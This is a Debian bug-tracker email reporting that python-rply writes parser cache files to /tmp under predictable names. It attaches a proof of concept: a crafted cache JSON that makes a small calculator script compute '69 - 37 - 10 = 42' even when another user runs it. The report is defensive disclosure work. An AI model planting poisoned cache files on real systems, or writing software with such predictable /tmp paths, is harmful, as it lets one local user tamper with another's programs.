Return-Path: <python-modules-team-bounces+dkg=fifthhorseman.net@lists.alioth.debian.org>
X-Original-To: dkg@terrist.org
Delivered-To: mail-dkg@che.mayfirst.org
Received: from itihasa.pair.com (itihasa.pair.com [209.68.5.116])
	by che.mayfirst.org (Postfix) with SMTP id 53C6EF984
	for <dkg@terrist.org>; Tue, 14 Jan 2014 04:21:16 -0500 (EST)
Received: (qmail 36420 invoked by uid 3326); 14 Jan 2014 09:21:16 -0000
Delivered-To: thought-fifthhorseman:net-daniel_gillmor@fifthhorseman.net
Received: (qmail 36417 invoked by uid 3326); 14 Jan 2014 09:21:16 -0000
Delivered-To: thought-fifthhorseman:net-dkg@fifthhorseman.net
Received: (qmail 36414 invoked from network); 14 Jan 2014 09:21:16 -0000
Received: from mailwash12.pair.com (66.39.2.12)
  by itihasa.pair.com with SMTP; 14 Jan 2014 09:21:16 -0000
Received: from localhost (localhost [127.0.0.1])
	by mailwash12.pair.com (Postfix) with SMTP id B9AF3C3815
	for <dkg@fifthhorseman.net>; Tue, 14 Jan 2014 04:21:16 -0500 (EST)
X-Virus-Check-By: mailwash12.pair.com
Received: from moszumanska.debian.org (moszumanska.debian.org [5.153.231.21])
	by mailwash12.pair.com (Postfix) with ESMTP id A0043C3812
	for <dkg@fifthhorseman.net>; Tue, 14 Jan 2014 04:21:16 -0500 (EST)
Received: from localhost ([::1] helo=moszumanska.debian.org)
	by moszumanska.debian.org with esmtp (Exim 4.80)
	(envelope-from <python-modules-team-bounces+dkg=fifthhorseman.net@lists.alioth.debian.org>)
	id 1W30BQ-0004ZR-4L
	for dkg@fifthhorseman.net; Tue, 14 Jan 2014 09:21:16 +0000
Received: from buxtehude.debian.org ([140.211.166.26])
 by moszumanska.debian.org with esmtp (Exim 4.80)
 (envelope-from <debbugs@buxtehude.debian.org>) id 1W30BJ-0004Z2-BB
 for python-modules-team@lists.alioth.debian.org;
 Tue, 14 Jan 2014 09:21:12 +0000
Received: from debbugs by buxtehude.debian.org with local (Exim 4.80)
 (envelope-from <debbugs@buxtehude.debian.org>)
 id 1W30BF-0007H0-UO; Tue, 14 Jan 2014 09:21:05 +0000
X-Loop: owner@bugs.debian.org
Resent-From: Jakub Wilk <jwilk@debian.org>
Original-Sender: Jakub Wilk <jwilk@master.debian.org>
Resent-To: debian-bugs-dist@lists.debian.org
Resent-CC: jwilk@debian.org, Debian Python Modules Team
 <python-modules-team@lists.alioth.debian.org>
X-Loop: owner@bugs.debian.org
Resent-Date: Tue, 14 Jan 2014 09:21:01 +0000
Resent-Message-ID: <handler.735263.B.138969104426279@bugs.debian.org>
X-Debian-PR-Message: report 735263
X-Debian-PR-Package: src:python-rply
X-Debian-PR-Keywords: security
X-Debian-PR-Source: python-rply
Received: via spool by submit@bugs.debian.org id=B.138969104426279
 (code B); Tue, 14 Jan 2014 09:21:01 +0000
Received: (at submit) by bugs.debian.org; 14 Jan 2014 09:17:24 +0000
Received: from master.debian.org ([82.195.75.110])
 from C=NA, ST=NA, L=Ankh Morpork, O=Debian SMTP, OU=Debian SMTP CA,
 CN=master.debian.org, EMAIL=hostmaster@master.debian.org (verified)
 by buxtehude.debian.org with esmtps (TLS1.2:DHE_RSA_AES_128_CBC_SHA1:128)
 (Exim 4.80) (envelope-from <jwilk@debian.org>) id 1W307g-0006pd-IS
 for submit@bugs.debian.org; Tue, 14 Jan 2014 09:17:24 +0000
Received: from jwilk by master.debian.org with local (Exim 4.80)
 (envelope-from <jwilk@debian.org>) id 1W307e-0005qZ-Ej
 for submit@bugs.debian.org; Tue, 14 Jan 2014 09:17:22 +0000
Date: Tue, 14 Jan 2014 10:17:11 +0100
From: Jakub Wilk <jwilk@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Message-ID: <20140114091711.GA3006@jwilk.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="3MwIy2ne0vdjdPXF"
Content-Disposition: inline
X-Reportbug-Version: 6.4.4
User-Agent: Mutt/1.5.21 (2010-09-15)
Delivered-To: submit@bugs.debian.org
Resent-Sender: Debian BTS <debbugs@buxtehude.debian.org>
x-debian-approved: yes
Subject: [Python-modules-team] Bug#735263: python-rply: insecure use of /tmp
X-BeenThere: python-modules-team@lists.alioth.debian.org
X-Mailman-Version: 2.1.15
Precedence: list
Reply-To: Jakub Wilk <jwilk@debian.org>, 735263@bugs.debian.org
List-Id: Debian Python Modules Team
 <python-modules-team.lists.alioth.debian.org>
List-Unsubscribe: <http://lists.alioth.debian.org/cgi-bin/mailman/options/python-modules-team>, 
 <mailto:python-modules-team-request@lists.alioth.debian.org?subject=unsubscribe>
List-Archive: <http://lists.alioth.debian.org/pipermail/python-modules-team/>
List-Post: <mailto:python-modules-team@lists.alioth.debian.org>
List-Help: <mailto:python-modules-team-request@lists.alioth.debian.org?subject=help>
List-Subscribe: <http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/python-modules-team>,
 <mailto:python-modules-team-request@lists.alioth.debian.org?subject=subscribe>
Errors-To: python-modules-team-bounces+dkg=fifthhorseman.net@lists.alioth.debian.org
Sender: "Python-modules-team"
 <python-modules-team-bounces+dkg=fifthhorseman.net@lists.alioth.debian.org>
X-SA-Exim-Connect-IP: ::1
X-SA-Exim-Mail-From: python-modules-team-bounces+dkg=fifthhorseman.net@lists.alioth.debian.org
X-SA-Exim-Scanned: No (on moszumanska.debian.org); SAEximRunCond expanded to false


--3MwIy2ne0vdjdPXF
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Disposition: inline

Source: python-rply
Version: 0.7.0-1
Severity: grave
Tags: security
Justification: user security hole

rply stores its cache files in /tmp. This is insecure, because /tmp is 
world-writable, and the filenames rply uses are of course predicatable.

Proof of concept is attached. If you put the rply-*.json file in /tmp 
and make it world-readable, then the tiny calculator's math will start 
to be slightly off (even when run by a different user than the owner of 
the cache file):

$ ls -l /tmp/rply-*.json
-rw-r--r-- 1 eve users 730 Jan 13 22:20 /tmp/rply-1-tinycalc-72306a09ee3b3fe5697e2d0114eb3ee132a6ff7a.json

$ whoami
jwilk

$ echo 69 - 37 - 10 | python3 tinycalc.py
69 - 37 - 10 = 42

-- 
Jakub Wilk

--3MwIy2ne0vdjdPXF
Content-Type: application/json
Content-Disposition: attachment; filename="rply-1-tinycalc-72306a09ee3b3fe5697e2d0114eb3ee132a6ff7a.json"
Content-Transfer-Encoding: quoted-printable

{"start": "main", "terminals": ["MINUS", "NUMBER", "PLUS", "error"], "lr_go=
to": [{"main": 1, "exp": 2}, {}, {}, {}, {"exp": 6}, {"exp": 7}, {}, {}], "=
rr_conflicts": [], "precedence": {"PLUS": ["left", 1], "MINUS": ["left", 1]=
}, "lr_action": [{"NUMBER": 3}, {"$end": 0}, {"PLUS": 4, "MINUS": 5, "$end"=
: -1}, {"PLUS": -4, "MINUS": -4, "$end": -4}, {"NUMBER": 3}, {"NUMBER": 3},=
 {"PLUS": 4, "MINUS": 5, "$end": -3}, {"PLUS": 4, "MINUS": 5, "$end": -2}],=
 "sr_conflicts": [], "default_reductions": [0, 0, 0, -4, 0, 0, 0, 0], "prod=
uctions": [["S'", ["main"], ["right", 0]], ["main", ["exp"], ["right", 0]],=
 ["exp", ["exp", "MINUS", "exp"], ["left", 1]], ["exp", ["exp", "PLUS", "ex=
p"], ["left", 1]], ["exp", ["NUMBER"], ["right", 0]]]}=0A
--3MwIy2ne0vdjdPXF
Content-Type: text/x-python; charset=us-ascii
Content-Disposition: attachment; filename="tinycalc.py"

#!/usr/bin/python3

import sys

import rply

lg = rply.LexerGenerator()
lg.add('PLUS', r'\+')
lg.add('MINUS', r'-')
lg.add('NUMBER', r'\d+')

lg.ignore(r'\s+')

pg = rply.ParserGenerator(
    ['NUMBER', 'PLUS', 'MINUS'],
    precedence=[('left', ['PLUS', 'MINUS'])],
    cache_id='tinycalc'
)

@pg.production('main : exp')
def main(p):
    [exp] = p
    return exp

@pg.production('exp : exp PLUS exp')
@pg.production('exp : exp MINUS exp')
def exp_op(p):
    [lhs, op, rhs] = p
    rhs = p[2]
    if op.getstr() == '+':
        return lhs + rhs
    else:
        return lhs - rhs

@pg.production('exp : NUMBER')
def exp_num(p):
    [tok] = p
    return int(tok.getstr())

lexer = lg.build()
parser = pg.build()

for line in sys.stdin:
    line = line.strip()
    n = parser.parse(lexer.lex(line))
    print(line, '=', n)

# vim:ts=4 sw=4 et

--3MwIy2ne0vdjdPXF
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Python-modules-team mailing list
Python-modules-team@lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/python-modules-team
--3MwIy2ne0vdjdPXF--